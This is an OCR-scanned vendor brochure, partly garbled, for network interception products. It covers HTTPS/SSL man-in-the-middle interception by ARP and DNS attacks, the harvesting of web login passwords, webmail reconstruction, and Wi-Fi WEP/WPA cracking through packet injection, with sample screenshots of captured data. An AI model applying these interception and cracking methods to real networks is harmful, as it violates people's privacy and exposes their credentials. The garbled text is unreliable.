> Full Text Search and Cross-Check 
> Online Warning Trigger by Keyword 


ED-GS Implementation 


== = = ~ 
t "A 
2:3 ~ 
Keep all activity records of ~ 
transactions, emails and file 


access for audit and monitoring 


Mirror all ; 
inbound Server Farm with 


Client PCs and Database Servers, Email 
outbound Server, ERP Server and 
data File Servers 


ue 


Enterprise Data Guard System on Intranet 


* Passive Operation 

* No Impact on 
Network 
Performance 

* No Effect on DB 

* Well Integration 
with SIEM 

e 1 or 2 Tiers of 
Infrastructure for 
Optimization 

* ED/GS Must Be 
Deployed between 
Servers and User 
Clients 

* At the Gateway of 
Server Farm 

* Acquire Data 
through Mirror or 
Forensic port of 


Sample - Database Commands 


Every Page:[ 5) 


№. С) Date-Time* Account пе Password Servere „ОВ Command DB Туре mA Whols 


11.0 pi 192 168.1199 геБоп seems 192 168.1.85 DE SELECT count(*) FROM WEBMAIL муза 14 à 
12.1 20120191 4921681199 fepot "== — 192168.185 DE SELECT AUTO, DATETIME, ACCOUNT,..MYSQL ГД à 


13.0 м 192 168.1.199/ report sees 192.168.1.85 DE SELECTCOUNT( AUTO)FROMHTTPLOG MYSQL ГА 3 
4.0 pos 192.168.1.199 герой “ж — 192.168.185 DE SELECT count(*) FROM HTTPLOG муза. (1 à 
15. O а’ 192.168.1/199 report *""" 192.168.1.85 DE SELECT AUTO, DATETIME, ACCOUNT, .MYSQL ГА § 


мч 123456789 м8 Total 927 Total Раде 186 Current Page 3 


* SQLLOG Search 
2012-01-01 |® ~ [2012-01-01 |$ 


Search Method: @Exact | © Similar 


OUT Шм. » Conditional Search on all DB 
——— M» б Transaction Records 


> Works on MySQL, MS SQL Server 
and Oracle DB 


> List of all DB Transactions 


Sample - MS CIFS Reconstruction 


З GIFS | Delete | & Search Every Page :[ 20) Confrm | 


Similar 
сс Whols 


2012-01-01 03-14 vic Vic Download 192.168.1.111  SHAREDGF-IR..  ED-DEC-2.16.2023 MANUAL. CH doc 19509 ГО а 
2012-01-01 03:13:56 vic Vic Download 192.168.1.111 ЅНАКЕР\5Р- 288... САТЅЕ 20т2 jpg %%к A 4 
2012-01-01 02:04:16 VHIPPCLASS stretch Download 192.168 1.111 PUBiclient\decisi... update ED-DEC-2 17 2001.633-111223-1543 tgz 187.88М fa а 
2012-01-01 02:02:33 IPPCLASS stretch Download 192 168 1.111 PUBiclient\decisi... update ED-DEC-2 16 2015 238-110209-1552 192 1.77M fa а 
Total 4 Total Page 1 Current Page 1 


Date-Time Account Username Action# Server? Path File Name Size 


* CIFS Search 
Date :|2012-01-01 |$ ~ 2012-01-01 9 


Ж. > List of all MS File Server Transactions 


1 ar od: ® = © Similar №. Ж Б 
» Conditional Search оп all MS File 


User |Search Method: G Exact | O Similar 
| Server Transaction Records 


Action p v " 
seems баа! Osmer Ш > Works on MS Windows File Server 
and Clients 


Search Method: (Exact | © Similar 
File Name | —— — — — — 


I 
|Search Method: G'Exact | © Similar 


Account 


EB 


Wireline Ethernet 
Interception & Real-Time 
Reconstruction Series 
HTTPS/SSL MITM 
Interc( ==" aii ystem 


DECISION?/ /2 
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Introduction to HTTPS/SSL MITM 


Interception 


HTTPS/SSL Interception Appliance (Software 
+ Hardware) 


= User can opt to purchase only software from 


* Intercept HTTPS/SSL vane usn шеол параде! МН 
attack or by Proxy setup. HTTPS/SSL MITM Interception system 
is standalone system. HTTPS/SSL Proxy is another standalone 
system. 

* HTTPS/SSL Interception by MITM mode is carried out utilizing 
both DNS and ARP attacks or utilizing the РВК of the 13/4 
switch/router. 

* HTTPS web pages on targeted user can be decrypted, decoded 
and reconstructed. Username and password can also be 
obtained for Web Login. 

* МА standard HTTPS/SSL traffic without additional ти 

MAE n e haere Dy Proxy mode required the targ 


t 
т НЫ preecal РЕ 


HTTPS/SSL МТМ Interception 


Svstem (Method 1 


WEB BASED 551 SERVERS 
Ех: 551 Google Account, 
Yahoo Account 


HTTPS/SSL Interception 


| и | By MITM Attack Methodology 


Router/Firewall 
E Manage 
Administrator 


SERVER FARM 
SWITCH/HUB 


Man-in-the Middle 
Attack 


USERS E Intercept and reconstruct 
| AT HTTPS/SSL traffic. Obtain HTTPS 
page login username and 
Targeted User password. Intercept on specific 
targets (suspects) 


HTTPS/SSL МТМ Interception 


Svstem (Method 1 


* HTTPS/SSL Interception by MITM mode is carried out utilizing 
both DNS and ARP attacks. (Methodology 1) 

* HTTPS web pages on targeted user can be decrypted, 
decoded and reconstructed. Username and password can 
also be obtained for Web Login. 

* Target User (Suspect) IP Address must be known or pre- 


configured in the setup of HTTPS/SSL Interception system. 
* Target Website Links (URLs) must also be pre-configured. 


* Concurrently attack up to 5 users (Optional for more users). 
% Sud a to standard HTTPS/SSL traffic without additional 


о view encrypted content, 
a key is a needed 


HTTPS/SSL МТМ Interception 


System (Method 2 


INTERNET Web Server 
SSL 
Gateway 2 
Router 
~ Gateway 
Router 
~ 2 HTTPS MITM 
~ - 
е = aoe 

-7 EN, 

- 


Targeted HTTPS traffic needs to 
be routed or redirected to this 
MITM system. 


VY 


13/4 Core 
Switch 

(Policy Routing 

Function) 


Note: This is just 
Oo» 2 EP г“ 1 | rt Б>. Im n a sample scaled 
әх x м e < мы down diagram 


ISP Subscribers Networks for illustration 


HTTPS/SSL МТМ Interception 
System (Method 2 


* HTTPS MITM Interception System is implemented to 
decrypt HTTPS traffic (ex: Gmail as target). Subscribers 
side HTTPS (ex: Gmail) traffic accessed needs to be 
rerouted to the HTTPS MITM Interception system. The 
system has NAT built in that can reroute the traffic to the 
Web Servers (ex: Gmail). 

* For example, Web Server IP X.X.X.X (ex: Gmail) accessed 
traffic being redirected (using PBR) to the HTTPS MITM 
Interception system from the Core Switch (L3/4 switch) or 
the Core Router from Subscribers network end. 

* HTTPS Web access content (ex: Gmail Read and Sent) of 
the targeted user can then be reconstructed in real-time 
by the HTTPS/SSL MITM Interception System. 

* Username and Password can also be obtained. 

М А this is for iih scale dila edd such as 


HTTPS/SSL Proxy Interception 


Svstem 


WEB BASED 551 SERVERS 
Ех: 551 Google Account, 
Yahoo Account 


HTTPS/SSL Interception 
By Proxy Methodology 


INTERNET 


SERVERS 


Router/Firewall 
чы Manage 
Administrator 


SERVER FARM 


SWITCH/HUB HTTPS/SSL Proxy 


ГУТ 


‘Sniffer Mode + Proxy 
Mode 


Intercept and reconstruct HTTPS/SSL traffic 
and protocols/services supported by proxy. 
Intercept on group of users (with proxy pre- 
configured ontarget users Web Browsers] 


Targeted Users Group 


HTTPS/SSL Proxy Interception 
System 


HTTPS/SSL Interception by Proxy implementation. 

Proxy pre-configured on the targeted user(s) ' Web Browser is 

required. 

HTTPS/SSL Interception by Proxy implementation can supports 

other protocols capturing and reconstruction besides 

HTTPS/SSL traffic. 

Some supported protocols are: Webmail (Yahoo Mail, Gmail, 

Hotmail etc.), IM (Yahoo, MSN, ICQ, IRC, QQ, Web MSN, Web 

Yahoo etc.), HTTP Web Browsing, P2P and Online Games). 

Can be implemented to a group of users (more than 100 

concurrent р, 
с | ird HTTPS/SSL traffic 


о view encrypted content, 
a key is a needed 


ED2S - Interception of Username & 


Login user name of URL 


No Date-Time 

1. 2010-08-04 13:06:57 
2. 2010-08-04 13:15:13 
3. 2010-08-04 13:15:13 
4. 2010-08-04 13:16:15 
5. 2010-08-04 13:18:19 
6. 2010-08-04 13:19:21 
7. 2010-08-04 13:19:22 
8. 2010-08-04 13:42:05 
9. 2010-08-04 13:54:29 
10. 2010-08-04 13:54:29 
11. 2010-08-05 14:27:20 
и«1» 


Targeted IP 


Password 
URLs browsed by Target IP 


User IP 
192.168 2.101 
192 168 2 101 
192.168 2.136 
192 168 2 136 
192 168 2.136 
192.168 2.136 
192 168 2 136 
192.168 2.101 
192.168 2.101 
192 168 2 101 
192.168 2 136 


TJ 


E — 
doc x 


mdame] com 


Login Password of URL 


Every Page :| 20) Сопіт | 


Password 
as 


а 
ка 


аа 


алара 
OA SI 


CEST 


https 
https 


https // 
https / 
https // 


https 
https 


https // 


https 


https // 


https 


Description 


/www.google.com/accounts/ServiceLoginAuth 


itogin yahoo.com/config/login? 


www.google.com/accounts/ServiceL oginAuth 
www amazon. com/gp/flex/sign-in/select html 
www.citibank.com.tw/TWGCB/JSO/signon/Proce.. 
/'www .global-ebanking.com/iiop/CPM17? 
/www.amazon com/qp/history/external/full-rh 


www.google com/accounts/ServiceL oginAuth 


Iwww.google.com/accounts/ServiceLoginAuth 


www. google com/accounts/ServiceLoginAuth 
/www google. com/accounts/ServiceLoginAuth 
Total 11 Total Page 1 Current Page 1 


Sample Gmail Read 


Raconctriuctinan 


А i Group: ALL = 


L3 Webmail(Read) | Ù Delete | & Seach|;SAccountlist — ____ЕмегуРаде|_ 10) Сопіт | 
No. п 0 Date-Time Account Sender Subject Webmail Type еа 
1. Е 2011-10-28 20:36:48 192.168.1.12 110220126сот + I 1 22182: Bandwidth Monitor Alert GMail T 
> 2011-10-28 20:36:48 192.168.1.12 11022@126сот + 11 8218! 2: Bandwidth Monitor Alert GMail Га, 
3. 2011-10-28 20:36:48 192.168.1.12 t1022@126.com “2/71 8218: 8: Bandwidth Monitor Alert GMail Га, 
4. Fi 2011-10-28 20:36:43 192.168.1.12 t1022@126.com + 1 827819: Bandwidth Monitor Alert GMail Га 
5. 2011-10-28 20:36:43 192.168.1.12 010229126.com + 7 1 #58 8: Bandwidth Monitor Alert GMail Га, 
6. Г 2011-10-28 20:36:36 192.168.1.12 wedetective 1 Фуаһоо.с... 4.4 M 1ез | бМай Га, 
7. B 2011-10-28 20:36:36 192.168.1.12 decisiongroup2010ggrf M, E] 434344343 GMail [A 
8 m 2011-10-28 ~ -J 252200483493 GMail [1 
9. 2011-10-2 аи 2 === |ы GMail Га, 
10. 2011-10-26 0 РЕ ‘lis Notification (Failure) GMail [A 
ми 12 Enter Pa] ита 0607507 Total 13 Total Page 2 Current Page 1 


434344343 


Jun 

| Decision 2 

Group <decisiongroup2010@gmail.com> 10:39 
AM 


To: Decision Group 
<decisiongroup2010@gmail.com> 


3453434534534534 


Gmail 


ee 
by Google 


Sample Gmail Sent 


Raconctriuctinan 


Visibility Group : ALL 5 
tes] Webmail (Sent) | WDelete | Разз Show | & Search | 8 Account List Every Page [ 10) | Confirm | 
No. © @ Date-Time Account Sender Password Receiver cc BCC Subject pening iini 

à "203724. TOES MEM "e" frankie@deci... CREER. > GMail Га, 
и«1» 


r — 
e https;//192.168.1.60/general/common/mail/openweb.php? 


р 


Total 1 Total Page 1 Current Page 1 


DATE / TIME : 2011-10-28 20:37:24 
TO: frankie@decision-groups.com 
SUBJECT : Email from 


Hello, 


This is a message for the XXX> 
Thanks. 


Regards, 
ЕС 


Gmail 


von s 
by Google 


Шет ее ——————-——-—--—-= 


EB 


Wireline Ethernet 
Interception & Real-Time 
Reconstruction Series 
E-Detective Backup Server 


DECISION?/ /e 
"ule б 


№ 
(Data Retention) 


Introduction to E-Detective Backup 


Server 


* E-Detective Backup Server (BS) is designed 
for viewing Backup ISO Data (Reconstructed Data 
backup by E-Detective System). 

* Provides a User Friendly GUI. Easy to import 
(mount ISO) and view the Backup Content 
especially for large amount of Backup 150 Files. 

* Capable to mount and view multiple Backup ISO 
Files at the same time. 

* Works with E-Detective system for Auto FTP 
Backup function. Allow Auto Backup ISO File in E- 
Detective to be stored in Backup Server. 

* Search and Advance Search functions provided 
to search into Backup ISO Content or specific 
Backup ISO Content. Р н 

* Easy Management of Backup ISO Еа 


Sample Screenshots of ED Backup 


$ HOMEPAGE | Ko '| && - INF 22 | Фф морғу те IB. 


ÖSO File List | Á Mount ISO File | 2/Delete ISO File | Г uMount ISO File Record/Page 


Status ISO File Name Create Time Backup Mode File Size 
10 e DC100315NQ8V M 20100627220342 2010-06-27 22:03:42 Manual 237MB 
2[] e DC100315NQ8V M 20100614135017 2010-06-14 13:50:17 Manual 78MB 
i «1» Total 2 Total Page 1 Current Page 1 


e Page - ISO File Content - Service Categories Statistics 


$ HOMEPAGE! Ko 


fi ISO File Content Record/Page : 100 
[ Search |[ Clear | | 

ISO File Name € $ O uo A M v = К ә 49 3«"* Q0 $2 ә ашо o 

| Summa: 30 0 15 6 66 2 0 о 0 3 0 0 1 1538 1387 52 56 0 4 3 0 0 0 71897 

1@DC100315NQ8V_M 20100627220342 29 011 6 66 2 0 0 0 3 0 0 1 1276 1148 36 49 0 4 3 0 0 0 57,801 

2Ф0С100315808У M 20100614135017 1 0 4 0 0 0 0 о о о о о о 22 239 16 7 0 0 о о о о 14,096 

i «1» Total 2 Total Page 1 Current Page 1 


Sample Screenshots of ED Backup 


9 оу sere. & STORAGEINFOMATION| ig SYSTEMI "i MODIFYPASSWORD | (M UPDATE | ышы | 


ISO File Content _ Record/Pa: 100 
ge: 


[ Search Аа Clear | 
ume ә Әчтезіешо o 
0 0 рада два 
86 49 0 4 3 0 0 0 57,801 
6 7 0 0 0 0 0 0 14,096 
Total 2 Total Page 1 Current Page 1 


Summary: 30 0 15 6 66 
19DC100315NQ8V M 20100627220342 29 0 11 6 66 
2@DC100315NQ8V_M 20100614135017 1 0 4 0 0 


ISO File Name € Ф быы №} 
2 
2 
0 


о ok d 
о ole Ф 
4 


о шо ш 


и«1» 


ЕСІЛ o SETUP 1 (Ж STORAGE INFOMATION | Q SYSTEM | ЗА MODIFY PASS 1 @ UPDATE! $P REGISTER 


софи »вод " UT IRC « s ARO- FADO 98% 


29 0 11 66 2 1 1246 1148 36 49 с 57801 
@НТТР Content | &Search Every Раде :| 20 [ 20][ Confirm | 


No. Date-Time Account Content 
101. 2010-06-23 17:00:47 frankie I S5Bet-at-Home E: 
102. 2010-06-23 17:00:45 frankie I Sb Bet-at-Home 


)-06-23 17:00:44 frankie I Sbgoogleads g.dou 
2 - ||-06-23 17:00:42 frankie 


(Е Juventus Sign Custodian М: 


GS we zu -= -æ = 
Ele Edit View Favorites Tools Help 
r = — »| 06-23 17:00:39 frankie 
Cp Favorites |6 Juventus Sign Custodian Marco Storari - - The Of... В-ы-сж- Pager Safety Too @- 
© To пер protect your security, Internet Explorer has Blocked this website from displaying content with security certificate errors: Click here for options. х |-8 


the services of custodian Marco Storari from Milan on a permanent basis to help provide a litle more depth and quality to our goalkeeping rotation. With a 
аа rici d today on Juventus” асый wcbsit- the аф ausounced Stoni ander wank бе accessary шелегі tests early сетін where the 33 year ali Е -06-23 17:00:36 frankie I SbFaceboo E 
passed with flying colours. Е 
-06-23 16:59:59 frankie (1 bBet-at-Home Extra 
Storari represents a much needed option next season between the pipes as Chimenti is turns 40 this June, and Manninger 5 allure seems to fade more and more as 
games go by. By many accounts, Marco should be able to challenge Alex for that number two spot behind Gigi as he’s proved to be very capable with solid -06-23 16:59:54 frankie 1% ДМАТР 
displays for Sampdoria and Milan this season. 
Milan, who has secured the services of Marco Amelia to replace Storari, was originally in talks with Sampdoria's Gasparin earlier this month about a permanent -06-23 16:59:53 frankie AOL Advertising's Boxii - Loading 


stay for Storari. However talks broke down on account of a disagreement in the asking price. But now with the ex-Samp duo Marotta and Del Neri at Juventus, 
their impressions of Storari whilst playing for them last year were highly regarded enough to warrant a higher bid from the Bianconeri. -06-23 16:59:53 frankie IS TPP 


“Тт not scared at having to replace Buffon. I have already performed this role for Christian Abbiati, Nelson Dida and Zeljko Kalac at Milan. I -06-23 16:59:53 frankie I Utarget FOX videoSub 

started a season as the fourth choice goalkeeper and ended up being first pick. I will do т) th a relaxed attitude. I am very happy to be at Е 

Juve. It's a great honour to play for this team and we can challenge for major objectives, torari. "I accepted Juve's proposal because this -06-23 16:59:52 frankie [=] Фад. admeld.com 

is a big club and signed me by spending a pretty penny. That's very satisfying to know. It's also true that the presence of former Sampdoria men 

Gigi Del Neri and Beppe Marotta was decisive in my choice.” -06-23 16:59:52 frankie Is btag admeld.com 
According to reports, we've signed the goalkeeper from Pisa on a three-year contract with the salary somewhere around the €1 million mark per season. In terms d 
of the transfer fee between the two clubs, not mach is know at the moment aside from Storari's “pretty penny" comment, but stay tuned for more details that wil -06-23 16:59:51 frankie ай yieldmanager.com 
be updated in the comments section below. 2 

+ -06-23 16:59:50 frankie мад admeld.com 
-06-23 16:59:48 frankie га www4.smartadserver.com 2c 


| њен Enter Page С] Total 1,148 Total Page 58 Current Page 6 


|| Done Ө Internet | Protected Mode: Off ат Rw% ~ 


Sample Screenshots of ED Backup 


Record/Page : 100 


[Advance ааа алд, 


= м 9 3 + зо Ф 

— 20. ооо о m —" 
1 ® DC100315NQ8V M 2010062722042 10 0 в о 1 о о о о о 0 ооо о о о о о 
2 Ф DC100315NQ8V M 2010061413507 0 0 т о о о о о 0 о ася 


i «« 1» Total 2 Total Page 1 Current Page 1 


Э о seui db зтоклсемғонатон | 8; SYSTEM! F mobrvPAsswORD! Ф UPDATE | oP REGISTER | 


ОЕ UK cds a9 9.48 oc 


HTP Link | QSearch | -— Every Page : [ 20] [ Confirm | 
No. Date-Time Account HOST 
1. 2010-06-23 12:33:06 frankie Decision Group - E-Detective 
2: 2010-06-23 11:23:32 frankie Decision Group - E-Detective 
3. 2010-06-23 09:14:08 defenceorg Decision Group - E-Detective 
4. 2010-06-23 09:14:05 defenceorg Decision Group - E-Detective 
5. 2010-06-23 09:14:05 defenceorg Decision Group - E-Detective 
6. 2010-06-23 09:14:03 defenceorg Decision Group - E-Detective Free Text S ea rc h 
T. 2010-06-23 09:13:55 defenceorg Decision Group - E-Detective F u n ct | О n 
8. 2010-06-23 09:13:51 defenceorg Decision Group - E-Detective 
9. 2010-06-23 09:13:48 defenceorg Decision Group - E-Detective 
10. 2010-06-23 09:13:47 defenceorg Decision Group - E-Detective 
11. 2010-06-23 09:13:41 defenceorg Decision Group - E-Detective 
12. 2010-06-23 09:13:41 defenceorg Decision Group - E-Detective 
13. 2010-06-23 09:13:39 defenceorg Decision Group - E-Detective-Network Forensics | Lawful Interception | Data Retention Solutions 
14. 2010-06-23 09:13:38 defenceorg Decision Group - E-Detective 
15. 2010-06-23 09:13:35 defenceorg Decision Group - E-Detective 
16. 2010-06-23 00:59:58 defenceorg Decision Group - E-Detective 


Ii «1» Total 16 Total Page 1 Current Page 1 


Sample Screenshots of ED Backup 


Y=) Оби, Ж STORAGE INFOMATION | 6; SYSTEM | А MODIFY PASSWORD | @ UPDATE | 27 REGISTER | 
fat 150 File Content 


Reeead/Page : 100 
m Advance Search = 


% E т 


ISO File Name € d$ X gn A RA XS A IT B & 8 am 


а . Summary : 30 0 15 Search Parameters Search Category Histo [ 
19Dc100315NQ8V M 20100627220342 29 0 11 Date - | 
29DC100315NQ8V M 20100614135017 1 0 4 Time : "m 5 
««1» Source IP 4^ 4 
Destination IP : 
Email Address : | _ Ф фе 
| Фы 
Subject : 
EXEC] +) SETUP | 8] STORAGEINFOMATION | |ң SYSTEM | % MODIFY PASSWORD | @ UPDATE | 27 REGISTER | Zz 
7T Record/Page : 100 à 
| Jf cea | [Advance Search | 
ISO File Name ~ а ye 8 фот F400 о” 
Summay: 16 0 11 6 6 5 0 0 0 3 0 0 1 1,314 дева 36 51 0 2 3 0 0 0 04 
1 ® DC100315NQ8V_M_20100627220342 16 0 11 6 66 5 0 0 0 3 0 0 1 36 49 0 2 3 0 0 0 0 
2 @ DC100315NQ8V_M_20100614135017 0 0 0 о 0 о о о о о о о о 052570) Oe OFF 0 то > О h 


Total 2 Total Dana 1 Currant Dano 
[ЖОПКО @ seme; @ storace INFOMATION | gs SYSTEM | MODIFY PASSWORD | @ UPDATE | 27 REGISTER | 


Sr е 3999 э ШС 8 @ РҮ T 


и«1» 


29 0 1 1276 1148 36 0 57801 

ЖӚНТТР Content 1 — Every Page а 
No. Date-Time Account Content 

Ad Vance S earc h 1 2010-06-23 17:51:09 frankie (Фа admeld.com 
а 2. 2010-06-23 17:50:54 frankie I bwww.google.com.sg 
F u n ct 1 О n 3. 2010-06-23 17:49:55 frankie ад. sensismediasmart.com.au 

4. 2010-06-23 17:49:55 frankie E bmedrx.sensis.com.au 
5. 2010-06-23 17:49:43 frankie 21% Whois record for 117.4.193.88 


мч 123456789 »»EnterPage| || Go | Total 1,148 Total Page 230 Current Page 1 


Wireline Ethernet 
Interception & Real-Time 
Reconstruction Series 


Ceniz3l Manage 


kd 


% 
| 
 "LALLLLLL 


System (Ef 


Introduction to CMS 


> Global view (with Centralized Web GUI 
Portal) of huge network Internet traffic 
through distributed or multiple E- 
Detective systems (at same or different 
locations). 

> Status information of all ED, ED2S and 
ED Backup Server Systems. 

> Easily aggregate, manage and 
configure multiple E-Detective systems, 
ED2S System (HTTPS/SSL MITM 
Interception System), ED Backup 
Server Systems. 

» Centralized reportina. 


CMS Implementation Architecture 


:- Detective System 


= Center Management System 
| Data Base | 


à Еше System 


[ | 
| -— 68 
" ni Auditor/U 
E-Detective System uditor/Use 
Data Base 
= à, File System 


:D2S System 


Data Retention 
Management System 


Data Base 


Ta File System 


+ ManagemenU/Query ——— Data Retention -4—— CMS UI 


> There are 3 segments/tier in the entire architecture: 

> 15- Front End Capture/Probes - E-Detective, ED2S 
(HTTPS/SSL) 

> 2"4- Data Retention Management System - ED Backup 
Server System, Storage 


[ | КА Е др Г \ М! ze | а m Та aj а 6 Г > } "n 2 2. 
|. ре Ге” L EAG) Vic пасјег (== || > \ 
"a aus L | Мы ш ' са ЕН б "us fl | | єз НОЛЬ МНЕИНЧК-МЕН е, = \ 


CMS - Sample GUI (1): Homepage 


ОЕ 


File Edit View Favorites Tools Нер 


Home Data Management - Data Management - System Management - 109 Out - 


Show 10 entries Search: 
HOST ~ TYPE 2 Status $ Mail $ CHAT 2 FILE TRANSFER $ HTTP $ OTHER $ 
192.168.1.122 ED-DEC Ө 300 0 0 0 0 
| First Previous 1 Next Last Showing 1 to 1 of 1 entries 


Copyright © GROUP INC. All Rights Reserved. Е fed PIU 


& 12595 + 


CMS - Sample GUI (2) 


| [=> | jtm] 
Өс 47” Су xy 
File Edit View Favorites Tools Нер 
zu ы 
CON Home | Data Management ~ Data Management ~ System Management ~ Log Out ~ 
DECISION 4 
жаты. 
Home $nbsp;HTTP? 192.168.1.122? НТТР 
| РОРЗ | IMAP SMTP WEBMAILR WEBMAILS HTTP | 
|Show 10 “| entries Search: | 
DateTime 2 Account $ From 5 To s сс 5 ВСС Subject 2 Sze $ 
postes QA decision@decision.com.tw vic@decision.com.tw ... tang0126@decision.co... Re ва Noto: 280834 
2012-01-01 МІМС302071 25 Зеедпе te ЖУЗ 
01:15:31 “PC 080@seed_net tw ming@decision.com.tw ЗЕ 4642 
а Em seminar@sinter.com.tw ming@decision.com.tw Же 26244 
am 2D н мо returnedm@return.pec.pcstore.com.tw returnedm@return.pec... <12/27 ЈЕ 1 > 107302 
01:15:55 -PC RR... 
"m А z id E ioc returnedm@return.pec.pcstore.com.tw returnedm@return.pec... 12/27,10:00%Е | 7751 
2012-01-01 MING302071 12/27”9:00%% 
01:15:55 “PC returnedm@return.pec.pcstore.com.tw returnedm(return.pec... +. 16011 
Эс АТНА. ми 
201 2-01 -01 МІМ6302071 webmail@ecfscop.epaper.com.tw ming302071@pchome.co... *201 Ит вх 24887 
01:15:55 -РС М... 
һ 


n 


CMS Specifications 


Product: Central Management System (CMS) 


| No | Features and Specifications 


Server Hardware Specifications: HW: Asus RS300 or HP ProLiant DL380/385 
Good CPU (Quad Core, Core i3/5/7 etc.), 8-16G RAM, 2-4 HDDs (total of 2TB), 2 Gigabit NIC 
Interface (Recommended Intel Chipset) etc. 


System Software Specifications 
General Implementation 


System Management - (Web GUI) IE Browser 
Aggregate, Manage and Configure Multiple E-Detective Systems (20 E-Detective Systems at 
lst stage, could expand subsequently). 


Provide Centralized Total Statistical Reports from Multiple E-Detective Systems 
Centralized Data Query (Search) 

Centralized Alert and Notification Rules 

Centralized Authority Management Functions 

Others - Optional: Topology Mapping 


Wireless LAN (Wi-Fi) 
Interception & Real-Time 
Reconstruction Series 


Wireless-D | lv Uystem 


КАНАШ у for Government & LEA users! 


Introduction to Wireless-Detective 


System 


Wi-Fi /WLAN IEEE 802.11a/b/g/n Interception 
and Forensics Investigation System 


e Scan all WLAN 802.11a/b/g/n 2.4 and 
5.0 GHz channels for Access Points and 
STAS. 

e Captures/sniffs WLAN 802.11a/b/g/n 
packets. 

The Smallest, Mobile, • Real-time decryption of WEP key (WPA- 


Portable and most ө кыл азы ош reconstruction 
Complete WLAN j 


. of WLAN packets 
Lawful Interception в stores data in raw and reconstructed 


System cantant а 
in the World! СТЕ: МІ ne Узето Web 
UUI 
Important Tool for inteligent gen en egy 9 А] 
as Police, Military, Forensics, Legal and уу, 


Lawful Interception Agencies. 


Notes: Pictures and logo are property of designated source or 


Wireless-Detective - Implementation 


WLAN packets transmitted over the air ranging 
up to 100 meters or more 
(by using High Gain and High Sensitivity 


А ! 
Router Firewall Wireless STA | 
ү \ xol 
„Ме“. > 
Access Point d ( A | — 
"d Wireless STA 2% 
\ | | 
A / (4 fe » | 
Wireless STA 
Wireless-Detective 


Wireless STA 


Wi-Fi Interception and Investigation - Standalone 
Architecture 
wie — System > 


Wireless-Detective - Implementation 


Implementation 
Utilizing multiple/distributed Wireless-Detective 
systems (Master - Slave) to conduct simultaneous 
capture. forbiddina and location estimation functions. 


Router Firewall Ж 
енені [а Wireless-Detective WLAN Lawful 


(Slave) 


а" i Interception 
dE E. \ Distributed 
ws « "s y ы ^ Architecture Wireless- 
AE ho „ке m \ Detective Deployment 
ка if 1; А y^ | (Utilizing min. of 2 systems for 
» _ Ж wea FP jd P _ ---. ” Simultaneous (Master & Slaves) 
Wireless-Detective Wireless-Detective `В capturing/forbidding functions. 
(Slave) pal (Slave) Capture a single channel, a 
_ 78 Wireless STA Wireless-Detective single AP or a single STA) 
"ШЕР ee -» Central Management 
(Master) 


Notes: For capturing multiple channels, each Wireless-Detective (WD) can reconfigure/act as 
standalone system. For example: Deploy 4 WD systems with each capturing on one single 


спа! ІП = z 


Wireless-Detective - AP Info - 


Capture Mode (1 


aying information of Wireless Devices (AP) in surrounding area 


MODE: ФАР (STA 


Capture \Forbidder/ Import/ Wepkey/ History/ Compare/ Work Log/ IDS/ Import & Export Config 


Capture Size : none Notification Filter Save List Refresh: 7 7 s. Auto Stop 

By Channel 

БЕНЕН ^ ~ | Manual | 

By Channel + АР 
AP |SCAN MANUAL BSSID СН. MB/S | KEY STR. BEACONS PACKETS| ESSID (STA Blocking 
1| © | Manual | # 00:23:51:7B:4D:CA | 6 54 WEP 8 476 0 2WIRE 0 | Blocking 
2 p Manual |# 00:21:29:99:82:В1 | 6 54 WPA 9 486 0 Нурег 0 |Blocking 
3 - Manual |% 00:1Ғ:В3:2В:53:26 6 54 WEP 7 180 0 |2WIR 0 | Blocking 
4 - Manual |% 00:10:7Е:26:7В:В1 | 1 48 WPA, 12 2467 15 |yeoh 0 Воскпа 
5 p Manual |# 00:1В:5В:АҒ:14:Е1! 2 54 WEP 7 394 0 дип 0 | Blocking 
6| € Manual Б 00:18:58:80:60:89 6 54 МЈЕР| 34 928 0 2У/ІКЕ9 0 | Blocking 
7| € Manual |# 00:1А:С4:ЕҒ:43:В8 6 54 WEP 7 364 0 2WIRE5 1 | Blocking 
8 | © | Manual |# 00:18:39: 5А:ВС:81 | 6 48 WEP 4 300 O\Elain | 0 | Blocking 
9| © | Manual |% 00:16:B6:E1:5B:2D | 11 54 WEP 3 3 OLIM 0 | Blocking 
101 © # 00:13:46:D1:9D:F9 | 6 Unknown 0 0 21 1 |Blocking 
11 Manual |» 00:11:09: 27:АТ:БЕ | 6 48 WPA, 27 1282 294 linksys 1 |Blocking 

i «1»» = Count: 11, Total: 1, In page 1| Rows рег раде: 20 [Submit | Update 


Obtainable 


Information: 
MAC of Wireless 
AP/Router, 
Channel, Mbps, 
Key, Signal 
Strength, 
Beacons, Packets, 
SSID, Number of 
Stations 
Connected. 


Wireless-Detective - STA Info - 


Capture Mode (2 


aying information of Wireless Devices (STA) in surrounding are 


Hard Disk Information : - 146G / Used - 3.3G / Available - 136G / Available (%) - 97% 


Capture \Forbidder/ Import/ Wepkey/ History/ Compare/ Work Log/ 105/ Import & Export Config 


MODE: © АР e STA 


Capture Size : none Notification Filter Save List Refresh: / Уз. Auto Stop 
STA SCAN MANUAL CLIENT MAC STR. PACKETS BSSID KEY СН.  ESSID Blocking 
1 © * ip 00:21:6B:00:21:6B 10 92 00:19:Е0:00:19:Е0 6 Blocking 
2 © # ip 00:1E:58:00:21:6B 4 3 00:21:91:00:19:Е0 1 Blocking 
3 © Manual |8 ip 00:1D:E0:00:21:6B 45 43 00:11:09: 00:11:09 | WPA | 6 linksys Blocking 
4 © Manual |8 ip 00:10:Е0:00:10:Е0 0 1100:16:В6:01:90:Ғ9/ WEP 11 LIM Blocking 
5 © # ip 00:18:0Е:00:10:Е0 5 1IFF:FF-FF-FF-FF-FF -1 Blocking 
6 © # ip 00:15:С1:00:10:Е0 3 11 00:19:E0:00:11:09 6 Blocking 
7 © # ip 00:14:A5:00:1D:E0 15 Т |FF:FF:FF:FF:FF:FF -1 Blocking 
8 © # ip 00:13:46:00:13:46 10 1428 | 00:22:B0:00:11:09 6 Blocking 
9 © # ip 00:11:50: 00:13:46 4 10 FF:FF:FF:FF:FF:FF -1 Blocking 
Mai» _ Сопп:: 9, Total: 1, In page 1 | Rows per page: 20 [ Submit ] Update 


Obtainable Information: 


Client MAC Address, Signal Strength, Packets, AP MAC 
Address, Key (Encrypted or Unencrypted), SSID. 


Cracking/Decryption of WEP/WPA 


WERN У Ktacking/Pne5y Benya de: dore4byr YESS bit key) 
Retive Cmewstep Ltilizing ARP packet injection (possibly 5-20 

› Crackiwiadfastem Default) or Manual Cracking 
Passive Crack - Silently collect Wireless LAN packe 
64-bit key - 10 HEX 


128-bit key - 26 HEX 


2) WPA-PSK Key Cracking/Decryption:-- (Optional Module 
